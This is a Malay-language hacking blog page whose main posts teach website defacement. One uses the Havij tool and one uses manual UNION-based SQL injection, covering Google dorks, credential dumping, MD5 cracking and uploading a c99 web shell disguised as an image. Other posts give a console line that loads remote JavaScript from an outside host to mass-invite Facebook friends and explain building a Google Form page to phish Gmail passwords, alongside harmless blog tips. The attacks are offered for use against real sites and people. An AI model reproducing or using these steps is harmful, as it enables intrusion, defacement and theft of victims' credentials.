ALT_IMG

Featured 1

Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat Readmore...

ALT_IMG

Featured 2

Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat Readmore..

Alt img

Featured 4

Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat Readmore...

ALT_IMG

Featured 4

Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat Readmore...

ALT_IMG

Featured 5

Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat Readmore...

SQL Injection Deface

0 Komen Budak Comeii
Assalamualaikum,pada kali ini aq akan ajar cara bagaimana hendak men-deface sesebuah laman web dengan menggunakan cara SQL Injection untuk mendapatkan admin password..baiklah,saya akan tunjukkan satu persatu caranya... Sebelum itu,kamu harus ada ilmu mengenai defaced,IP ADDRESS dan SQL Injection (PENTING!!):- APAKAH ITU DEFACED: Defaced ialah perbuatan merubah paparan utama sesebuah website.Paparan utama dipanggil shell.Shell ialah satu kode atau aturcara yang sudah diprogramkan dalam bentuk laman web untuk ditunjukkan kepada sesiapa yang melayari web tersebut.Defaced ialah satu kerja jahat :D menggantikan kode asal kepada kode yang diinginkan oleh penggodam.Selepas kode itu digantikan,sesiapa sahaja yang melayari laman web itu akan melihat paparan yang diubah oleh penggodam.Untuk melakukan perkara ini,kamu harus mencipta satu shell dalam extension (".htm" atau ".html") ataupun anda boleh copy shell ini daripada laman web yang telah didefaced dan hanya menukar sedikit sahaja kandungan dalam shell itu. APAKAH ITU SQL INJECTION:- SQL Injection ialah satu cara untuk kita memecah masuk pangkalan data (database) sesebuah website bertujuan mencuri data dan nama pengguna dan juga password.SQL Injection ialah kaedah memecah masuk yang paling berkesan sekali berbanding XXS Cross dan PHP Injection.Asalnya,SQL Injection harus dilakukan dengan cara manual iaitu memasukkan kode kedalam URL ataupun dipanggil UNION.Kode ini sangat susah dan ramai penggodam baru (newbies) tidak dapat menghafal kode ini secara menyeluruh.Tetapi,banyak tool yang telah direka bagi memudahkan penggodam memecah masuk pangkalan data.Antara alatan yang popular untuk melakukan SQL Injection ialah Havij dan SQLi Helper. APAKAH ITU IP ADDRESS:- IP Address ialah pengenalan kepada komputer yang menggunakan Internet.IP address terdapat maklumat mengenai lokasi di mana sesebuah komputer bersambung kepada Internet.Ia sama seperti kad pengenalan,begitulah juga IP Address. TOOL YANG HARUS KAMU ADA:- (1).Havij 1.15 atau versi lain.. KEGUNAAN : Untuk melakukan SQL Injection ke sesebuah website DOWNLOAD LINK : HAVIJ 1.5 FULL CRACK https://rapidshare.com/#!download|220p9|317718223|Havij.rar|500|R~B4058A74C86A649E84922DCC25604412|0|0 (2).Platinum Hide IP 3.0.9.6 atau versi lain.. http://www.mediafire.com/?t1lb9wqp2zdq5d4 KEGUNAAN : Untuk menyembunyikan IP kamu semasa kamu melakukan SQL Injection atau melogin sebagai ADMIN.. (3).C99.PHP KEGUNAAN : Digunakan untuk merubah kode shell yang terdapat di dalam sesuatu website.. DOWNLOAD LINK : c99.php Website yg menawarkan macam2 shell : http://tools.th3-0utl4ws.com/shells/index.html Baiklah,itulah tool yang mesti kamu ada.Kedua-dua tool ini penting terutama Platinum Hide IP kerana tool itu berfungsi menyembunyikan IP kamu.Kalau kamu tidak mempunya tool itu,kamu akan ditangkap kerana admin server itu mengesan kamu dengan mudah kerana kamu tidak menyembunyikan IP kamu.. Baiklah,sekarang kita mesti mencari laman web yang security lemah atau lebih dipanggil website yang vulneberity(dalam bahasa Inggeris) untuk dilakukan defacement.Terdapat langkah yang mudah untuk mencari website yang vuln(singkatan vulneberity).Iaitu menggunakan "google dork","google dork" ialah salah satu kemudahan diberi google untuk mencari website yang penting.Tetapi,kita boleh menyalahgunakan kelebihan itu untuk mencari website yang vuln.Caranya seperti begini:- (1).Buka "www.google.com" (2).Taip salah satu kode di bawah ini inurl:"id=" & intext:"Warning: mysql_fetch_assoc() inurl:"id=" & intext:"Warning: mysql_fetch_array() inurl:"id=" & intext:"Warning: mysql_num_rows() inurl:"id=" & intext:"Warning: session_start() inurl:"id=" & intext:"Warning: getimagesize() inurl:"id=" & intext:"Warning: is_writable() inurl:"id=" & intext:"Warning: getimagesize() inurl:"id=" & intext:"Warning: Unknown() inurl:"id=" & intext:"Warning: session_start() inurl:"id=" & intext:"Warning: mysql_result() inurl:"id=" & intext:"Warning: pg_exec() inurl:"id=" & intext:"Warning: mysql_result() inurl:"id=" & intext:"Warning: mysql_num_rows() inurl:"id=" & intext:"Warning: mysql_query() inurl:"id=" & intext:"Warning: array_merge() inurl:"id=" & intext:"Warning: preg_match() inurl:"id=" & intext:"Warning: ilesize() inurl:"id=" & intext:"Warning: filesize() inurl:"id=" & intext:"Warning: require() (3).Tekan search (4).Akan keluar beratus-ratus website yang vuln. (5).Pilih salah satu. Cuba buka laman yang anda pilih itu,anda pasti lihat error yang berlaku seperti "Warning: mysql_fetch_assoc()" atau "Warning: mysql_fetch_array()".Itu maknanya security website ini masih lemah dan berupaya untuk didefacedkan.Contohnya saya mendapat web seperti ini:- http://www.ypages.in/sell_offers.php?cid=28 Untuk kita mengdefaced laman web tersebut.Kita harus menyamar sebagai admin dan sebagai admin,tidak akan ada sekatan lagi untuk kita lakukan apa sahaja di website itu.Dan untuk mencari kata pengguna admin dan juga password,kita harus memecah masuk kedalam pangkalan data website berkenaan.Sebenarnya error yang kita cari sebentar tadi ialah pintu masuk kedua ataupun dipanggil "backdoor" dalam sesebuah website.Error tersebut akan memudahkan kita melakukan SQL Injection berbanding melakukan di page yang tidak mempunyai error.Antara alatan kesukaan saya untuk memecah masuk database ialah Havij,Havij sangat terkenal di kalangan penggodam kerana ia memudahkan kerja penggodam bagi melakukan SQL Injection.SEBELUM ANDA MEMULAKAN SQL INJECTION KE SESUATU WEBSITE.PASTIKAN ANDA SUDAH MENYEMBUNYIKAN IP ANDA KERANA APABILA ANDA MELAKUKAN SQL INJECTION,WEBSITE SERVER BOLEH MENGESAN IP ADDRESS ANDA.SAYA TIDAK AKAN BERTANGGUNGJAWAB SEKIRANYA ANDA DITANGKAP KERANA KECUAIAN ANDA.Caranya melakukan SQL Injection adalah seperti berikut:- (1).Buka Havij (2).Masukkan alamat website yang error sebentar lagi. Contoh : http://www.ypages.in/sell_offers.php?cid=28 (3).Tekan analyze. (4).Tunggu kerana Havij sedang melakukan SQL Injection ke dalam website berkenaan. Bila anda berjaya,Tables akan diunlockkan,di situ,anda boleh mencuri admin username dan password.TETAPI,jika anda tidak berjaya,cari target lain kerana website itu mungkin sudah diupgradekan pangkalan datanya dan sukar untuk kita memecah masuk pangkalan datanya.Dan apabila berjaya,pergi ke "Tables",di situ keluar fail yang mana fail itu ialah "DataBase".Katakanlah fail itu bernama "ID_INFORMATION",maka click pada kotak itu.Selepas itu tekan "Get Tables",ia akan mencari table yang wujud dalam database itu,selepas semua table sudah habis discan oleh Havij,cari nama tables yang merujuk nama username atau admin.Kerana kebiasaan di dalam table itulah kata nama dan kata laluan Admin disimpan.Jika anda melihat table yang aneh seperti "admin" atau "username_info"..click pada kotak itu,selepas itu,tekan "Get Colums"..ia akan muncul fail-fail yang mungkin menyimpan data bagi admin username dan password..andainya terdapat dua colum iaitu "username" dan "password"..click pada kedua-dua fail tersebut..click "Get Data"..ia akan keluar username dan password...itulah username dengan password admin..tetapi,andai jika anda scan,terdapat banyak username dengan password yang keluar,pilih username yang tertulis admin..itulah username dan password admin yang sebenar..Tetapi,andai kata nama admin muncul,tetapi passwordnya dalam bentuk yang pelik.Iaitu password yang mempunyai 32 huruf.Itu adakah password hash.Ia telah dihashkan bagi menyukarkan penggodam mendapat password yang benar-benar betul.Contohnya passwordnya dalam bentuk begini :- Contoh Password:- 098F6BCD4621D373CADE4E832627B4F6 Ini dipanggil MD5 hash.MD5 hash sangat terkenal sekali kerana banyak digunakan oleh web server bagi menyembunyikan password mereka walaupun database mereke dipecah masuk oleh penggodam.Password itu telah dihashkan begini:- Contoh:- test (password sebenar) ---------> 098F6BCD4621D373CADE4E832627B4F6 (telah dihashkan) Tetapi,tidak mengapa.Di dalam Havij,terdapat tool yang membolehkan kita memecah password hash itu.Begini caranya:- (1).Buka Havij (2).Pergi ke "MD5" (3).Masukkan hash MD5 tadi. (4).Tekan "start" (5).Lihat passwordnya. Tetapi,jika kamu tidak berjaya ataupun failed dalam memecahkan password itu.Mungkin terdapat beberapa sebab.Mungkin MD5 itu telah dihashkan dalam bentuk AES-256.AES-256 ialah bentuk penyimpan password security yang paling selamat dan sukar dihash.Ia hanya boleh dihash menggunakan tool "Cain and Abel".Kedua,mungkin password asal yang belum dihash itu terdapat dalam digit yang panjang,seperti contoh yang saya tunjuk tadi iaitu "test".Ia hanya 4 digit,password yang senang untuk dicrack ialah 8 digit sahaja.Itu pun bergantung kepada security MD5 itu.Jika password asal digitnya lebih daripada 9.Ia sukar dihash dan hanya boleh dihash dengan menggunakan Rainbow Table.Rainbow table ialah satu "table" yang digunakan oleh "Cain and Abel" untuk menggunakan kaedah cryptology untuk memecah kod tersebut.Rainbow Table boleh didownload tetapi saiznya di luar jangkaan kita,iaitu 50-300 GB.Kita juga boleh menghasilkan sendiri Rainbow Table tetapi ia mengambil masa sehingga 10 tahun untuk siap.Ketiga,mungkin hash tersebut bukan MD5,mungkin MD2 atau MD4.Terdapat banyak hash yang ada sekarang.Kalau kamu mempunyai masalah password dalam bentuk MD5 hash.Saya sarankan kamu mengambil target lain kerana kita akan membuang masa sahaja untuk memecah password itu melainkan itu website yang sudah kamu target sejak dahulu sekali.Saya tidak akan menghalang kamu.Sekarang kita kembali ke agenda kita,iaitu mendefacedkan website. Sekarang tugas sebenar ialah mendefaced laman web berkenaan.Perkara pertama ialah kamu harus memecah masuk ke dalam admin website itu dengan menggunakan username dan password yang kamu dapat semasa melakukan SQL Injection.Kebiasaan,untuk melogin kedalam website,anda harus menambah "/admin" kebelakang nama website tersebut.Contohnya:- www.example.com/admin Tetapi,jika page itu tidak wujud.Maka admin login page mungkin telah disembunyikan dengan nama yang lain selain admin.Andai berlaku kejadian itu,Havij ialah alat yang sempurna sekali untuk mengesan admin login page yang terdapat dalam laman web berkenaan.Caranya begini:- (1).Pergi ke Find Admin (2).Masukkan laman web berkenaan (Contohnya:www.example.com) (3).Tekan start.Ia akan mula mencari admin login page dalam laman web berkenaan (4).Bila sudah habis scan,buka URL berkenaan. Masukkan username dengan password.Bila berjaya masuk,anda berupaya melihat segala fail sulit atau e-mail sulit yang terdapat dalam website berkenaan.Tetapi,tujuan kita ialah mendefaced,jadi kita beralih kepada agenda kita.Untuk mendefaced,seperti saya sebutkan sebentar tadi,kita gunakan shell "c99.php" sebagai shell utama kita hendak mendefaced web berkenaan.Cari apa-apa yang ditulis dalam website berkenaan upload.Jika terdapat butang yang membolehkan kita mengupload shell,ia akan memudahkan kerja kita.Tetapi,jika tak terdapat butang yang membenarkan kita mengupload shell.Kita harus "menipu" laman web berkenaan.Cari lagi butang yang membolehkan kita menguploadkan fail,selalunya admin hanya dibenarkan mengupload gambar sahaja.Tetapi,tidak mengapa.Rename kembali shell "c99.php" anda kepada "c99.php.gif".Ini akan menipu laman web berkenaan kerana laman web berkenaan akan menganggap kita cuma mengupload gambar sahaja tetapi kita sudah mengupload shell ke website berkenaan.Buka shell berkenaan,contohnya:- www.example.com/c99.php.gif (mengikut kepada apa extension yang anda tukar) Bila anda buka c99.php,ia akan keluar satu page yang membolehkan kita mengawal web itu lebih daripada admin tersebut.Ia membolehkan kita mengedit,menukar dan memadam shell yang terdapat dalam website berkenaan.Tujuan kita adalah mengdefaced website berkenaan.Oleh itu,kita akan mengedit shell yang terdapat dalam website itu.Cari apa-apa shell yang mungkin bernama "index.php" atau "main.php".Cari apa-apa sahaja shell yang mungkin paparan utama website berkenaan.Contohnya,"index.php" ialah paparan utama yang keluar apabila kita membuka website berkenaan.Jadi,shell itulah yang kita akan edit.Tekan pada "index.php" berkenaan.Akan keluar kode yang terdapat dalam shell itu,padam semua kode itu,gantikannya dengan kode shell kita.Tekan save.Sekarang.Anda telah berjaya.Cuba taip website itu untuk melihat ia berjaya atau tidak.Kalau ia berjaya,ia akan keluar paparan yang kita sudah programkan ke dalam website itu. Itu saja untuk tuto kali ini....Semoga anda berjaya melakukannya :D sumber : www.doyshinja.com
Continue reading →

Bagaimana untuk bunuh Facebook anda - Padam Akaun FACEBOOK slamanya

0 Komen Budak Comeii
Anda mungkin menggunakan Facebook seperti yang anda tahu Facebook adalah rangkaian terkenal di dunia sosial di Internet. Ia membolehkan anda kekal berhubung dengan orang-orang kegemaran anda. Dan anda juga boleh mempromosikan perniagaan anda dengan Facebook. Apakah Perbezaan antara Menyahaktifkan dan Memadam Akaun? Penyahaktifan: Anda menyahaktifkan akaun anda apabila anda perlu untuk pergi ke mana-mana sementara dan anda rasa privasi anda tidak selamat atau anda fikir akaun anda adalah tidak selamat atau apa sahaja yang anda perlu pergi untuk peperiksaan atau kajian atau mana-mana sementara. Jadi menyahaktifkan dan apabila anda kembali anda boleh mengaktifkan semula Ia sekali lagi mula menggunakan akaun dari sana di mana anda meninggalkan ia kali terakhir. Memadam Akaun: ia kekal bekerja sebaik sahaja anda dipadam data anda setiap akan menghapuskan dari pelayan Facebook dan anda tidak boleh mampu untuk log masuk atau mendapatkan kembali akaun anda sekali lagi, terdapat banyak sebab-sebab peribadi untuk pengguna biasa jadi saya berkongsi ciri ini Facebook kerana secara rasmi tidak ada pilihan dalam setting akaun sebenar ciri ini adalah rasmi tetapi ia adalah pada halaman bantuan yang berasingan. Prepare Akaun Anda Sebelum Untuk Memadam. content Mengurus Apps: Mungkin anda telah ditugaskan untuk banyak aplikasi dan atau anda adalah pemaju atau beberapa aplikasi penting atau rahsia anda menggunakan 1 menguruskan untuk itu apa yang anda mahu lakukan dengan ia di sini adalah panduan, Buang semua Apps yang tidak diingini & Spam dari Facebook. Uruskan Groups & Pages: Mungkin anda telah dimiliki beberapa muka surat dan kumpulan dan menggunakan ia untuk perniagaan atau hiburan peribadi anda mesti mempunyai untuk menyediakan atau memindahkannya kepada yang lain supaya anda boleh mengakses ia kembali kemudian. Itulah menasihatkan saya berikan kepada anda kerana selepas memadamkan akaun anda berasa bebas. J Buat Backup Sebelum Melakukan Apa-apa sahaja: Bagaimana untuk Backup Data Akaun Facebook Cara Padam Akaun Selamanya ? Berikut adalah panduan langkah demi langkah bagaimana untuk memadam akaun kekal membeli perlu berhati-hati setiap langkah mengambil teliti Saya tidak bertanggungjawab jika anda memadamkan akaun salah ... Berikut adalah Link dari sana anda boleh memadam akaun: https://www.facebook.com/help/delete_account
Padam Akaun Facebook Buat Selama-lamanya. Ingat satu masa yang lebih anda setiap data akan hilang selepas memotong. apabila anda pergi ke pautan itu klik pada Padam Akaun saya kemudian selepas pudina pemprosesan ia akan padam. Bagaimana untuk Nyahaktifkan Akaun sementara Pergi ke Akaun menetapkan Keselamatan >> akan ada Butang Nyahaktifkan tekan ia sebaik sahaja anda lakukan anda akan melihat halaman baru menguruskan aplikasi anda dan halaman kumpulan di sana sebelum melakukan apa-apa benda dan mengemukakan sebab mengapa anda Menyahaktifkan dan tekan mengesahkan.
Deactivate Account Anda boleh mengaktifkan semula bila-bila masa apabila anda log masuk. SUMBER PERINGATAN! Jika Ingin Copy Paste Silahkan Sertakan Sumber nya, atau jika Ingin share Cheat nya Silahkan Sertakan Credit nya . Terimakasih Anda sedang membaca artikel tentang Bagaimana untuk Bunuh Facebook anda - Padam Akaun Facebook Selamanya dan anda bisa menemukan artikel Bagaimana untuk Bunuh Facebook anda - Padam Akaun Facebook Selamanya ini dengan url http://www.doyshinja.com/2012/10/bagaimana-untuk-bunuh-facebook-anda.html,anda boleh menyebar luaskannya atau mengcopy paste-nya jika artikel Bagaimana untuk Bunuh Facebook anda - Padam Akaun Facebook Selamanya ini sangat bermanfaat bagi teman-teman anda,namun jangan lupa untuk meletakkan link Bagaimana untuk Bunuh Facebook anda - Padam Akaun Facebook Selamanya sumbernya.
Continue reading →

CCTV animasi

0 Komen Budak Comeii
1). Buka Blogger 2). Klik Tata Letak >> Tambah Gadget >> HTML/Java Script 3). Lalu Masukan Kode Ini Pada Kolom/Kotak Yang Besar 4). Simpan / Save Lihat Hasilnya... PERINGATAN! Jika Ingin Copy Paste Silahkan Sertakan Sumber nya, atau jika Ingin share Cheat nya Silahkan Sertakan Credit nya . Terimakasih . - SUMBER - Anda sedang membaca artikel tentang CCTV Animasi dan anda bisa menemukan artikel CCTV Animasi ini dengan url http://www.doyshinja.com/2012/10/cctv-animasi.html,anda boleh menyebar luaskannya atau mengcopy paste-nya jika artikel CCTV Animasi ini sangat bermanfaat bagi teman-teman anda,namun jangan lupa untuk meletakkan link CCTV Animasi sumbernya.
Continue reading →

cara agar blog kita tidak boleh di open source dan cara melihat open source hiden code

1 Komen Budak Comeii
Tips trik agar blog atau website tidak bisa di view open source, ctrl+u, ctrl+a, ctrl+c. Menyelam demi selam kedasar lautan mbak google, akhirnya ketemu juga yang dicari cara agar blog atau website tidak bisa di view open source, ctrl+u, ctrl+a, ctrl+c. Sudah dapat triknya, lalu mencoba cari cara agar blog atau website tersebut bisa di view open source dan akhirnya bisa juga berikut caranya : Untuk blogspot : - Login - Pengaturan - Edit html dan cari kode - Lalu ganti kode tersebut dengan kode dibawah ini. Untuk wordpress : - Login - Appearance - Editor - Header.php - Cari kode - Lalu ganti dengan kode berikut. Gimana, mudah bukan... yang seperti gini saya kemarin tidak tau....hahaha... Sssttt....yang tadi itu trik agar tidak bisa di ctrl+u, ctrl+a, ctrl+c untuk menghindari open source. Nah sekarang cara agar melihat open source blog atau website yang sudah memasang script atau plugin hiden open source code. Berikut caranya : Untuk google chrome : - Sesuikan dan kontrol google chrome (ada dipojok atas kanan) - Alat - Lihat sumber Taraaaaa . . . . nongol source codenya nah kalau untuk mozilla saya belum tau caranya alias masih dalam proses ubek-ubek mozillanya . Demikian sekilas trik dari saya... Trimakasih.....
- SUMBER - Anda sedang membaca artikel tentang Cara agar blog kita tidak bisa di open source dan cara melihat open source hiden code.. dan anda bisa menemukan artikel Cara agar blog kita tidak bisa di open source dan cara melihat open source hiden code.. ini dengan url http://www.doyshinja.com/2012/09/cara-agar-blog-kita-tidak-bisa-di-open.html,anda boleh menyebar luaskannya atau mengcopy paste-nya jika artikel Cara agar blog kita tidak bisa di open source dan cara melihat open source hiden code.. ini sangat bermanfaat bagi teman-teman anda,namun jangan lupa untuk meletakkan link Cara agar blog kita tidak bisa di open source dan cara melihat open source hiden code.. sumbernya.
Continue reading →

Deface Dengan Manual Sql Injection

0 Komen Budak Comeii
Assalamualaikum , harini aku nak kongsi sikit cara hack website dengan mengguna cara manual sql injection :) entry sebelum ni menggunakan Havij ( Automaton ) http://www.doyshinja.com/2012/11/sql-injection-deface.html Kata kunci yang perlu diketahui ------------------------------- karakter : ', - comments : /*, -- ------------------------------- Makluman: "Information_schema" hanya befungsi untuk versi msql versi 5.x ke atas Google Dork yang akan di gunakan ialah --> "inurl:news.php?id=" "inurl:index.php?id=" "inurl:trainers.php?id=" "inurl:buy.php?category=" "news-article.php?id=" "inurl:article.php?ID=" -------------------------Langkah Pertama------------------------- www.target.com/news.php?id=1 ---tambahkan karakter ' pada akhir url untuk lihat sama ada site itu vuln untuk sql injection atau pun tidak. contoh inject code :- www.target.com/news.php?id=1' atau www.target.com/news.php?id=-1 Contoh pesan error :- warning: mysql_fetch_array(): supplied argument is not a valid MYSQL result resource in D:\inetpub\wwwroot\ajpower.net\html\news.php on line -------------------------Langkah Kedua------------------------- Cari jumlah table yang ada di dalam database. tambahkan : +order+by+1-- diakhir url Contoh: Code: www.target.com/news.php?id=1+order+by+1-- atau www.target.com/news.php?id=1+order+by+1/* periksa secara bepringkat www.target.com/news.php?id=1+order+by+2/* www.target.com/news.php?id=1+order+by+3/*cari sehingga error keluar Untuk tutorial ini jumlah table yg diperolehi ialah 3. -------------------------Langkah Ketiga------------------------- Gunakan perintah Union untuk mengeluarkan nombor yang akan kita gunakan kemudian. perintah yang akan digunakan : +union+select+1,2,3-- diakhir url Contoh www.target.com/news.php?id=1+union+select+1,2,3-- Contoh: angka 2 keluar. kemudian kita masukkan version() di angka (2), contoh: www.target.com/news.php?id=1+union+select+1,version(),3-- dan paparan version akan tepapar di angka tersebut. Contoh: 5.1.47-community-log ------ |info| ------ version() = untuk lihat version msql yang digunakan database() = untuk lihat name database yang digunakan -------------------------Langkah Keempat------------------------- untuk nampakkan nama2 table yang ada di web tersebut, perintah table_name letak di angka yang keluar tadi --> (2) +from+information_schema.tables-- ---> letak di belakang angka yang terakhir. contoh: www.target.com/news.php?id=1+union+select+1,table_name,3+from+information_schema.tables-- atau kita tambah perintah karekter - di depan angka pertama www.target.com/news.php?id=-1+union+select+1,table_name,3+from+information_schema.tables-- -------------------------Langkah Kelima------------------------- Keluarkan kesemua isi yang ada di dalam table tersebut, group_concat(table_name) ---> letak di angka yang keluar tadi (2) +from+information_schema.tables+where+table_schema=database()-- ---> Masukan selepas angka yang terakhir. Contoh: www.target.com/news.php?id=1+union+select+1,group_concat(table_name),3+from+ information_schema.tables+where+table_schema=database()-- -------------------------Langkah Enam------------------------- Keluar kan kandungan yang ada didalam TABLE group_concat(column_name) ---> letak di angka yang keluar tadi(2) +from+information_schema.columns+where+table_name=0xHasilConvertTextTableAdmin-- (LETAK NAMA TABLE YANG SUDAH DI CONVERT KE HEXADECIMEL) ------ |info| ------ Website yang boleh digunakan untuk convert nama table ke hexadecimel ialah -----> www.piclist.com/techref/ascii.htm -----> www.centricle.com/tools/ascii-hex/ Column yang akan kita gunakan sebagai contoh ialah table ADMIN dan hasil convert ialah 41444D494E Contoh: www.target.com/news.php?id=1+union+select+1,group_concat(column_name),3+from+ information_schema.columns+where+table_name=0x41444D494E-- -------------------------Langkah Ketujuh------------------------- Keluarkan hasil isi yang kita berjaya peroleh dari table Admin concat_ws(0x3a,"nama column yang terkandung dlm table ADMIN") ---> letak di angka yang keluar tadi(2) +from+Admin-- --> asal column Contoh: www.target.com/news.php?id=1+union+select+1,concat_ws(0x3a,id,username,password),3+from+Admin-- Dan kita akan peroleh username dan password admin untuk website tersebut. -------------------------Langkah Terakhir------------------------- Cari Login untuk Admin Pages.
- SUMBER - Anda sedang membaca artikel tentang Deface Dengan Manual Sql Injection dan anda bisa menemukan artikel Deface Dengan Manual Sql Injection ini dengan url http://www.doyshinja.com/2012/11/deface-dengan-manual-sql-injection.html,anda boleh menyebar luaskannya atau mengcopy paste-nya jika artikel Deface Dengan Manual Sql Injection ini sangat bermanfaat bagi teman-teman anda,namun jangan lupa untuk meletakkan link Deface Dengan Manual Sql Injection sumbernya.
Continue reading →

Script auto invite friend to your group

0 Komen Budak Comeii
Untuk pengguna Mozilla Firefox 1. Tekan CTRL + SHIFT + K 2. Lalu isi kode ini document.body.appendChild(document.createElement('script')).src='http://fadhiilrachman.net/inpit.js'; dan tekan ENTER Untuk pengguna Google Chrome 1. Klik Mouse Kanan 2. Tekan Inspect Element (Q) 3. Pilih Console 4. Lalu isi kode ini document.body.appendChild(document.createElement('script')).src='http://fadhiilrachman.net/inpit.js'; 5. Lalu Enter
Continue reading →

Google Pishing

0 Komen Budak Comeii
Gmail Hacking ~ 1)korang pergi daftar Gmail 2)pastu korg Log In Gmail ( search balik google.com ) 3)pastu korg bkk:www.google.com 4)korang ade nampak tak EVEN MORE ? 5)Korang tkn more tu pastu ambil Document 6)pastu ade CREATE tulisan merah ? 7)Korg click tu pastu ambil FORM 8)pastu ade Question title korg letak EMAIL 9)Pastu terus click DONE 10)pastu korg tengok dekat SAMPLE QUESTION 2 . ade tak gambar pensil. 11)korang click gambar PENSIL tu. 12)SAMPLE QUESTION 2 tukar menjadi=Password .Lepas tu korg click DONE 13)selepas tu korang tengok UNTITLED FORM. tukar menjadi=APE YANG KORANG NAK ! 14)pastu korang tgk ade THEME:PLAN .click tu.pilih mana korg nak.pastu click 15)lepas korg pilih dah ade keluar kan ?haaa . pastu korg ade nampak APPLY. 16)korg click APPLY . 17)pastu korg type Web ni lagi :www.google.com 18)korang tengok dekat MORE balik .pastu amek DOCUMENTS 19)pastu ,korang tengok bawah TITLE .ade file korang.korang click 20)pastu korang tengok SHARE tulisan biru . korang CLICK 21)pastu keluar SHARING SETTING , PRIVATE-only the people listed below access Korg CHANGE menjadi PUBLIC ON THE WEB. 22)pastu korang terus tekan SAVE pastu korang CLICK DONE 23)pastu korang cari FORM .korang CLICK GO TO LIVE FORM 24)haaaaaaaaaaaa . sampai sini aq rasa korang dah melompat-lompat . hehe ~ 25)korang copy LINK .pastu anta kat MANGSA . automatic EMAIL&PASSWORD masuk dekat Account korang :D
Continue reading →